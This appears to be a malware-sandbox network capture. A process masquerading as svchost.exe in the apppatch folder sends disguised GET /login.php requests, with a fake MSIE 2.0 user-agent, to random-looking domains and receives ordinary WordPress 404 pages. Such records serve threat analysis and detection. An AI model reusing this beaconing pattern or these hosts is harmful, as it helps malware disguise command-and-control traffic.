                                                                                                                                                                                                          2024-11-11 17:24:13 UTC1369INData Raw: 6c 6f 77 3a 68 69 64 64 65 6e 21 69 6d 70 6f 72 74 61 6e 74 3b 76 69 73 69 62 69 6c 69 74 79 3a 68 69 64 64 65 6e 7d 61 6d 70 2d 73 74 6f 72 79 7b 76 69 73 69 62 69 6c 69 74 79 3a 68 69 64 64 65 6e 21 69 6d 70 6f 72 74 61 6e 74 7d 68 74 6d 6c 2e 69 2d 61 6d 70 68 74 6d 6c 2d 66 69 65 3e 61 6d 70 2d 61 6e 61 6c 79 74 69 63 73 7b 70 6f 73 69 74 69 6f 6e 3a 69 6e 69 74 69 61 6c 21 69 6d 70 6f 72 74 61 6e 74 7d 5b 76 69 73 69 62 6c 65 2d 77 68 65 6e 2d 69 6e 76 61 6c 69 64 5d 3a 6e 6f 74 28 2e 76 69 73 69 62 6c 65 29 2c 66 6f 72 6d 20 5b 73 75 62 6d 69 74 2d 65 72 72 6f 72 5d 2c 66 6f 72 6d 20 5b 73 75 62 6d 69 74 2d 73 75 63 63 65 73 73 5d 2c 66 6f 72 6d 20 5b 73 75 62 6d 69 74 74 69 6e 67 5d 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 61 6d 70 2d 61 63 63 6f
                                                                                                                                                                                                          Data Ascii: low:hidden!important;visibility:hidden}amp-story{visibility:hidden!important}html.i-amphtml-fie>amp-analytics{position:initial!important}[visible-when-invalid]:not(.visible),form [submit-error],form [submit-success],form [submitting]{display:none}amp-acco


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          4192.168.2.849729188.114.97.34431736C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          2024-11-11 17:24:14 UTC267OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: lysyvan.com
                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                          2024-11-11 17:24:16 UTC1096INHTTP/1.1 404 Not Found
                                                                                                                                                                                                          Date: Mon, 11 Nov 2024 17:24:16 GMT
                                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          vary: Accept-Encoding
                                                                                                                                                                                                          expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                          Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                          link: <https://lysyvan.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                                                          server-timing: amp_sanitizer;dur="40.2",amp_style_sanitizer;dur="17.0",amp_tag_and_attribute_sanitizer;dur="19.1",amp_optimizer;dur="16.5"
                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Y18DXrT%2F9z8DtBA23h%2FX3H52NNln7eEl6sslKjOcPSZB3RDBDEvP8rIj%2BWLHipysLFQPIKan28%2FIalWX0p%2Bzfb4GY%2BvGK4lyVAa4rJ4Poca7oeVw9%2F7c3ykdb7hhXA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                          CF-RAY: 8e0ff985994bc420-EWR
                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1127&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2825&recv_bytes=881&delivery_rate=2445945&cwnd=250&unsent_bytes=0&cid=47a52306f7354900&ts=1809&x=0"
                                                                                                                                                                                                          2024-11-11 17:24:16 UTC273INData Raw: 37 63 31 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 64 61 74 61 2d 61 6d 70 2d 62 69 6e 64 2d 63 6c 61 73 73 3d 22 69 73 44 61 72 6b 20 3f 20 27 6e 65 76 65 2d 64 61 72 6b 2d 74 68 65 6d 65 27 20 3a 20 27 6e 65 76 65 2d 6c 69 67 68 74 2d 74 68 65 6d 65 27 22 20 63 6c 61 73 73 3d 22 6e 65 76 65 2d 64 61 72 6b 2d 74 68 65 6d 65 22 20 61 6d 70 3d 22 22 20 64 61 74 61 2d 61 6d 70 2d 61 75 74 6f 2d 6c 69 67 68 74 62 6f 78 2d 64 69 73 61 62 6c 65 20 74 72 61 6e 73 66 6f 72 6d 65 64 3d 22 73 65 6c 66 3b 76 3d 31 22 20 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 3d 22 22 20 69 2d 61 6d 70 68 74 6d 6c 2d 6e 6f 2d 62 6f 69 6c 65 72 70 6c 61 74 65 3d 22 22 20 69 2d 61 6d 70 68 74 6d 6c 2d 62
                                                                                                                                                                                                          Data Ascii: 7c16<!DOCTYPE html><html lang="en-US" data-amp-bind-class="isDark ? 'neve-dark-theme' : 'neve-light-theme'" class="neve-dark-theme" amp="" data-amp-auto-lightbox-disable transformed="self;v=1" i-amphtml-layout="" i-amphtml-no-boilerplate="" i-amphtml-b
                                                                                                                                                                                                          2024-11-11 17:24:16 UTC1369INData Raw: 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 61 6d 70 70 72 6f 6a 65 63 74 2e 6f 72 67 22 3e 3c 73 74 79 6c 65 20 61 6d 70 2d 72 75 6e 74 69 6d 65 3d 22 22 20 69 2d 61 6d 70 68 74 6d 6c 2d 76 65 72 73 69 6f 6e 3d 22 30 31 32 34 31 30 31 36 31 38 30 31 30 30 30 22 3e 68 74 6d 6c 7b 6f 76 65 72 66 6c 6f 77 2d 78 3a 68 69 64 64 65 6e 21 69 6d 70 6f 72 74 61 6e 74 7d 68 74 6d 6c 2e 69 2d 61 6d 70 68 74 6d 6c 2d 66 69 65 7b 68 65
                                                                                                                                                                                                          Data Ascii: ta charset="UTF-8"><meta name="viewport" content="width=device-width,minimum-scale=1"><link rel="preconnect" href="https://cdn.ampproject.org"><style amp-runtime="" i-amphtml-version="012410161801000">html{overflow-x:hidden!important}html.i-amphtml-fie{he
                                                                                                                                                                                                          2024-11-11 17:24:16 UTC1369INData Raw: 2d 73 63 72 6f 6c 6c 69 6e 67 3a 74 6f 75 63 68 21 69 6d 70 6f 72 74 61 6e 74 7d 23 69 2d 61 6d 70 68 74 6d 6c 2d 77 72 61 70 70 65 72 3e 62 6f 64 79 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 21 69 6d 70 6f 72 74 61 6e 74 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 31 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73 70 61 72 65 6e 74 21 69 6d 70 6f 72 74 61 6e 74 7d 23 69 2d 61 6d 70 68 74 6d 6c 2d 77 72 61 70 70 65 72 2b 62 6f 64 79 7b 76 69 73 69 62 69 6c 69 74 79 3a 76 69 73 69 62 6c 65 7d 23 69 2d 61 6d 70 68 74 6d 6c 2d 77 72 61 70 70 65 72 2b 62 6f 64 79 20 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 69 67 68 74 62 6f 78 2d 65 6c 65 6d 65 6e 74 2c 23 69 2d 61 6d 70 68 74 6d 6c 2d 77 72 61 70 70 65 72 2b 62 6f 64 79 5b 69 2d 61 6d 70 68 74 6d 6c 2d 6c 69 67 68
                                                                                                                                                                                                          Data Ascii: -scrolling:touch!important}#i-amphtml-wrapper>body{position:relative!important;border-top:1px solid transparent!important}#i-amphtml-wrapper+body{visibility:visible}#i-amphtml-wrapper+body .i-amphtml-lightbox-element,#i-amphtml-wrapper+body[i-amphtml-ligh
                                                                                                                                                                                                          2024-11-11 17:24:16 UTC1369INData Raw: 77 69 64 74 68 3a 31 30 30 25 21 69 6d 70 6f 72 74 61 6e 74 7d 61 6d 70 2d 73 74 6f 72 79 5b 73 74 61 6e 64 61 6c 6f 6e 65 5d 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 21 69 6d 70 6f 72 74 61 6e 74 7d 61 6d 70 2d 73 74 6f 72 79 2d 70 61 67 65 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 37 35 37 35 37 35 7d 61 6d 70 2d 73 74 6f 72 79 20 2e 61 6d 70 2d 61 63 74 69 76 65 3e 64 69 76 2c 61 6d 70 2d 73 74 6f 72 79 20 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 6f 61 64 65 72 2d 62 61 63 6b 67 72 6f 75 6e 64 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 21 69 6d 70 6f 72 74 61 6e 74 7d 61 6d 70 2d 73 74 6f 72 79 2d 70 61 67 65 3a 6e 6f 74 28 3a 66 69 72 73
                                                                                                                                                                                                          Data Ascii: width:100%!important}amp-story[standalone]{background-color:#000!important;position:relative!important}amp-story-page{background-color:#757575}amp-story .amp-active>div,amp-story .i-amphtml-loader-background{display:none!important}amp-story-page:not(:firs
                                                                                                                                                                                                          2024-11-11 17:24:16 UTC1369INData Raw: 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 2d 72 65 73 70 6f 6e 73 69 76 65 29 2c 5b 77 69 64 74 68 5d 5b 68 65 69 67 68 74 5d 5b 73 69 7a 65 73 5d 3a 6e 6f 74 28 69 6d 67 29 3a 6e 6f 74 28 5b 6c 61 79 6f 75 74 5d 29 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 2d 72 65 73 70 6f 6e 73 69 76 65 29 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 2d 69 6e 74 72 69 6e 73 69 63 2c 5b 6c 61 79 6f 75 74 3d 69 6e 74 72 69 6e 73 69 63 5d 5b 77 69 64 74 68 5d 5b 68 65 69 67 68 74 5d 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 2d 69 6e 74 72 69 6e 73 69 63 29 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f
                                                                                                                                                                                                          Data Ascii: .i-amphtml-layout-responsive),[width][height][sizes]:not(img):not([layout]):not(.i-amphtml-layout-responsive){display:block;position:relative}.i-amphtml-layout-intrinsic,[layout=intrinsic][width][height]:not(.i-amphtml-layout-intrinsic){display:inline-blo
                                                                                                                                                                                                          2024-11-11 17:24:16 UTC1369INData Raw: 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 62 6c 75 72 72 79 2d 70 6c 61 63 65 68 6f 6c 64 65 72 2c 2e 69 2d 61 6d 70 68 74 6d 6c 2d 66 69 6c 6c 2d 63 6f 6e 74 65 6e 74 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 30 3b 6d 61 78 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 6d 69 6e 2d 77 69 64 74 68 3a 31 30 30 25 3b 77 69 64 74 68 3a 30 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 2d 73 69 7a 65 2d 64 65 66 69 6e 65 64 20 2e 69 2d 61 6d 70 68 74 6d 6c 2d 66 69 6c 6c 2d 63 6f 6e 74 65 6e 74 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74
                                                                                                                                                                                                          Data Ascii: {display:none!important}}.i-amphtml-blurry-placeholder,.i-amphtml-fill-content{display:block;height:0;max-height:100%;max-width:100%;min-height:100%;min-width:100%;width:0;margin:auto}.i-amphtml-layout-size-defined .i-amphtml-fill-content{position:absolut
                                                                                                                                                                                                          2024-11-11 17:24:16 UTC1369INData Raw: 74 62 75 69 6c 74 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 2d 63 6f 6e 74 61 69 6e 65 72 29 3e 2a 2c 5b 6c 61 79 6f 75 74 5d 3a 6e 6f 74 28 5b 6c 61 79 6f 75 74 3d 63 6f 6e 74 61 69 6e 65 72 5d 29 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 65 6c 65 6d 65 6e 74 29 3e 2a 2c 5b 77 69 64 74 68 5d 5b 68 65 69 67 68 74 5d 5b 68 65 69 67 68 74 73 5d 3a 6e 6f 74 28 5b 6c 61 79 6f 75 74 5d 29 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 65 6c 65 6d 65 6e 74 29 3e 2a 2c 5b 77 69 64 74 68 5d 5b 68 65 69 67 68 74 5d 5b 73 69 7a 65 73 5d 3a 6e 6f 74 28 5b 6c 61 79 6f 75 74 5d 29 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 65 6c 65 6d 65 6e 74 29 3e 2a 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 61 6d 70 2d 69 6d 67 3a 6e 6f 74 28 2e
                                                                                                                                                                                                          Data Ascii: tbuilt:not(.i-amphtml-layout-container)>*,[layout]:not([layout=container]):not(.i-amphtml-element)>*,[width][height][heights]:not([layout]):not(.i-amphtml-element)>*,[width][height][sizes]:not([layout]):not(.i-amphtml-element)>*{display:none}amp-img:not(.
                                                                                                                                                                                                          2024-11-11 17:24:16 UTC1369INData Raw: 74 3b 62 6f 74 74 6f 6d 3a 30 21 69 6d 70 6f 72 74 61 6e 74 3b 7a 2d 69 6e 64 65 78 3a 31 7d 61 6d 70 2d 69 6d 67 5b 69 2d 61 6d 70 68 74 6d 6c 2d 73 73 72 5d 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 65 6c 65 6d 65 6e 74 29 3e 5b 70 6c 61 63 65 68 6f 6c 64 65 72 5d 7b 7a 2d 69 6e 64 65 78 3a 61 75 74 6f 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6e 6f 74 62 75 69 6c 74 3e 5b 70 6c 61 63 65 68 6f 6c 64 65 72 5d 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 68 69 64 64 65 6e 2d 62 79 2d 6d 65 64 69 61 2d 71 75 65 72 79 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 65 6c 65 6d 65 6e 74 2d 65 72 72 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a
                                                                                                                                                                                                          Data Ascii: t;bottom:0!important;z-index:1}amp-img[i-amphtml-ssr]:not(.i-amphtml-element)>[placeholder]{z-index:auto}.i-amphtml-notbuilt>[placeholder]{display:block!important}.i-amphtml-hidden-by-media-query{display:none!important}.i-amphtml-element-error{background:


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                          5192.168.2.863211188.114.96.3443
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          2024-11-11 17:24:28 UTC267OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: qegyhig.com
                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                          2024-11-11 17:24:28 UTC951INHTTP/1.1 404 Not Found
                                                                                                                                                                                                          Date: Mon, 11 Nov 2024 17:24:28 GMT
                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          vary: Accept-Encoding
                                                                                                                                                                                                          expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                          Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                          link: <https://qegyhig.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FV%2F0CO4X%2BNUM2MVKtEbAmAMlFZfeD06dqRZx%2FWrfPyim6RXSsXZdpWofdYr6oGBl3fXciDO%2FtQ9hl56jZcLYaqFawr20HIjWLvmh98eRHHcycRJf%2B9Eq5aZq9tvqJg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                          CF-RAY: 8e0ff9dc19cac461-EWR
                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1273&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2823&recv_bytes=881&delivery_rate=2485836&cwnd=251&unsent_bytes=0&cid=8328a6600c482dbd&ts=825&x=0"
                                                                                                                                                                                                          2024-11-11 17:24:28 UTC418INData Raw: 37 63 61 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 20 0a 09 20 3c 73 74 79 6c 65 3e 0d 0a 23 77 70 61 64 6d 69 6e 62 61 72 20 23 77 70 2d 61 64 6d 69 6e 2d 62 61 72 2d 77 63 63 70 5f 66 72 65 65 5f 74 6f 70 5f 62 75 74 74 6f 6e 20 2e
                                                                                                                                                                                                          Data Ascii: 7ca6<!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="profile" href="https://gmpg.org/xfn/11"> <style>#wpadminbar #wp-admin-bar-wccp_free_top_button .
                                                                                                                                                                                                          2024-11-11 17:24:28 UTC1369INData Raw: 73 74 79 6c 65 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 0a 09 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 69 73 20 6f 70 74 69 6d 69 7a 65 64 20 77 69 74 68 20 74 68 65 20 59 6f 61 73 74 20 53 45 4f 20 70 6c 75 67 69 6e 20 76 32 31 2e 33 20 2d 20 68 74 74 70 73 3a 2f 2f 79 6f 61 73 74 2e 63 6f 6d 2f 77 6f 72 64 70 72 65 73 73 2f 70 6c 75 67 69 6e 73 2f 73 65 6f 2f 20 2d 2d 3e 0a 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 65 6e 5f 55 53 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72
                                                                                                                                                                                                          Data Ascii: style><meta name='robots' content='noindex, follow' />... This site is optimized with the Yoast SEO plugin v21.3 - https://yoast.com/wordpress/plugins/seo/ --><title>Page not found -</title><meta property="og:locale" content="en_US" /><meta pr
                                                                                                                                                                                                          2024-11-11 17:24:28 UTC1369INData Raw: 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29 7d 3b 73 65 73 73 69 6f 6e 53 74 6f 72 61 67 65 2e 73 65 74 49 74 65 6d 28 6f 2c 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 74 29 29 7d 63 61 74 63 68 28 65 29 7b 7d 7d 66 75 6e 63 74 69 6f 6e 20 70 28 65 2c 74 2c 6e 29 7b 65 2e 63 6c 65 61 72 52 65 63 74 28 30 2c 30 2c 65 2e 63 61 6e 76 61 73 2e 77 69 64 74 68 2c 65 2e 63 61 6e 76 61 73 2e 68 65 69 67 68 74 29 2c 65 2e 66 69 6c 6c 54 65 78 74 28 74 2c 30 2c 30 29 3b 76 61 72 20 74 3d 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 65 2e 67 65 74 49 6d 61 67 65 44 61 74 61 28 30 2c 30 2c 65 2e 63 61 6e 76 61
                                                                                                                                                                                                          Data Ascii: tion c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.canva
                                                                                                                                                                                                          2024-11-11 17:24:28 UTC1369INData Raw: 65 64 22 21 3d 74 79 70 65 6f 66 20 50 72 6f 6d 69 73 65 26 26 28 6f 3d 22 77 70 45 6d 6f 6a 69 53 65 74 74 69 6e 67 73 53 75 70 70 6f 72 74 73 22 2c 73 3d 5b 22 66 6c 61 67 22 2c 22 65 6d 6f 6a 69 22 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 3d 7b 65 76 65 72 79 74 68 69 6e 67 3a 21 30 2c 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 3a 21 30 7d 2c 65 3d 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 22 2c 65 2c 7b 6f 6e 63 65 3a 21 30 7d 29 7d 29 2c 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 4a 53 4f 4e 2e
                                                                                                                                                                                                          Data Ascii: ed"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener("DOMContentLoaded",e,{once:!0})}),new Promise(function(t){var n=function(){try{var e=JSON.
                                                                                                                                                                                                          2024-11-11 17:24:28 UTC1369INData Raw: 63 6f 6e 63 61 74 65 6d 6f 6a 69 3f 74 28 65 2e 63 6f 6e 63 61 74 65 6d 6f 6a 69 29 3a 65 2e 77 70 65 6d 6f 6a 69 26 26 65 2e 74 77 65 6d 6f 6a 69 26 26 28 74 28 65 2e 74 77 65 6d 6f 6a 69 29 2c 74 28 65 2e 77 70 65 6d 6f 6a 69 29 29 29 7d 29 29 7d 28 28 77 69 6e 64 6f 77 2c 64 6f 63 75 6d 65 6e 74 29 2c 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 29 3b 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 61 73 74 72 61 2d 74 68 65 6d 65 2d 63 73 73 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 71 65 67 79 68 69 67 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 61 73 74 72 61 2f 61 73 73 65 74 73 2f 63 73 73 2f 6d 69 6e 69 66 69 65 64
                                                                                                                                                                                                          Data Ascii: concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(e.wpemoji)))}))}((window,document),window._wpemojiSettings);</script><link rel='stylesheet' id='astra-theme-css-css' href='https://qegyhig.com/wp-content/themes/astra/assets/css/minified
                                                                                                                                                                                                          2024-11-11 17:24:28 UTC1369INData Raw: 74 65 2d 64 65 73 63 72 69 70 74 69 6f 6e 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 39 33 37 35 72 65 6d 3b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 7d 2e 65 6e 74 72 79 2d 74 69 74 6c 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 36 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 36 32 35 72 65 6d 3b 7d 68 31 2c 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 34 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 35 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 36 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 65 6d 3b 7d 68 32 2c 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 33 32 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 72 65 6d 3b 66 6f 6e 74
                                                                                                                                                                                                          Data Ascii: te-description{font-size:15px;font-size:0.9375rem;display:none;}.entry-title{font-size:26px;font-size:1.625rem;}h1,.entry-content h1{font-size:40px;font-size:2.5rem;font-weight:600;line-height:1.4em;}h2,.entry-content h2{font-size:32px;font-size:2rem;font
                                                                                                                                                                                                          2024-11-11 17:24:28 UTC1369INData Raw: 3a 2d 77 65 62 6b 69 74 2d 73 6c 69 64 65 72 2d 74 68 75 6d 62 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 64 31 30 34 30 34 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 64 31 30 34 30 34 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 7d 2e 73 69 74 65 2d 66 6f 6f 74 65 72 20 61 3a 68 6f 76 65 72 20 2b 20 2e 70 6f 73 74 2d 63 6f 75 6e 74 2c 2e 73 69 74 65 2d 66 6f 6f 74 65 72 20 61 3a 66 6f 63 75 73 20 2b 20 2e 70 6f 73 74 2d 63 6f 75 6e 74 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 64 31 30 34 30 34 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 64 31 30 34 30 34 3b 7d 2e 73 69 6e 67 6c 65 20 2e 6e 61 76 2d 6c 69 6e 6b 73 20 2e 6e 61 76 2d 70 72 65 76 69 6f 75 73 2c 2e 73 69 6e 67 6c 65 20 2e 6e 61 76 2d 6c 69 6e 6b 73 20 2e 6e 61 76 2d 6e 65
                                                                                                                                                                                                          Data Ascii: :-webkit-slider-thumb{border-color:#d10404;background-color:#d10404;box-shadow:none;}.site-footer a:hover + .post-count,.site-footer a:focus + .post-count{background:#d10404;border-color:#d10404;}.single .nav-links .nav-previous,.single .nav-links .nav-ne
